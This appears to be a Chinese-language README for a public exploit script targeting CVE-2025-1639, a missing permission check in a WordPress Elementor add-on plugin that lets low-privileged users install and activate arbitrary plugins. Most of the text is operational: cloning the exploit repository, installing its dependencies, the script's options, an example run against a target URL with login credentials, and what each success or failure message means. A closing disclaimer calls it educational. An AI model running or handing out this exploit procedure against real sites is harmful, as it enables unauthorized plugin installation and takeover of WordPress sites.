WordPress 的 Animation Addons for Elementor Pro 插件在所有版本(包括 1.6)中,由于 install_elementor_plugin_handler() 函数缺少权限检查,导致存在未经授权安装任意插件的漏洞。这使得经过身份验证的攻击者(具有订阅者级别及以上的访问权限)能够安装和激活任意插件,当目标站点未激活 Elementor 时,该漏洞可被利用来进一步感染受害者。
requests 库BeautifulSoup 库git clone https://github.com/Nxploited/CVE-2025-1639.git
cd CVE-2025-1639
pip install -r requirements.txt
usage: CVE-2025-1639.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit script for CVE-2025-1639 # By Nxploit | Kaled ALenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-pl PLUGIN, --plugin PLUGIN
Plugin slug to upload and activate (default: wp-maintenance-mode)
-u、--url:目标 URL-un、--username:WordPress 用户名-p、--password:WordPress 密码-pl、--plugin(可选):要上传并激活的插件别名(默认:wp-maintenance-mode)python CVE-2025-1639.py -u http://example.com/wordpress -un admin -p password -pl wp-maintenance-mode
Logged in successfully.:表示登录成功。The site is vulnerable... Exploiting and uploading the plugin.:表示目标站点存在漏洞,正在利用并上传插件。Plugin uploaded and activated successfully.:表示插件已成功上传并激活。Failed to log in.:表示登录失败。The site is not vulnerable.:表示目标站点未运行存在漏洞的版本。Failed to extract security token.:表示提取利用所需的安全令牌失败。Failed to upload and activate the plugin.:表示上传并激活插件失败。本脚本仅供教育目的使用。使用风险自负。作者不对因使用本脚本造成的任何损害承担责任。